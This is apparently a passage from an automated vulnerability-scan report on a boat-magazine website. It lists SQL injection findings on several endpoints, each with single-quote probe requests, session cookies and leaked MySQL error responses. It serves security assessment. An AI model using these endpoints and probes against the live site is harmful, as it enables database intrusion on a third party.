Request 2

GET /boat-shop/sea-savvy?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.54. http://www.soundingsonline.com/boat-shop/tech-talk [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/tech-talk

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/tech-talk?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/tech-talk?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

1.55. http://www.soundingsonline.com/boat-shop/used-boat-review [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/used-boat-review

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/used-boat-review?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/used-boat-review?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

1.56. http://www.soundingsonline.com/calendar [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/calendar

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /calendar?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /calendar?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.57. http://www.soundingsonline.com/career-opportunities [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/career-opportunities

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /career-opportunities?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /career-opportunities?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.58. http://www.soundingsonline.com/columns-blogs [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /columns-blogs?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.59. http://www.soundingsonline.com/columns-blogs/bay-tripper [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/bay-tripper

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /columns-blogs/bay-tripper?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs/bay-tripper?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.60. http://www.soundingsonline.com/columns-blogs/books [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/books

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /columns-blogs/books?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs/books?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

1.61. http://www.soundingsonline.com/columns-blogs/new-england-fishing [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/new-england-fishing

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /columns-blogs/new-england-fishing?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs/new-england-fishing?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.62. http://www.soundingsonline.com/columns-blogs/under-way [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/under-way

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /columns-blogs/under-way?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

Request 2

GET /columns-blogs/under-way?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:40 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.63. http://www.soundingsonline.com/component/chronocontact/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/chronocontact/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component'/chronocontact/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component''/chronocontact/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
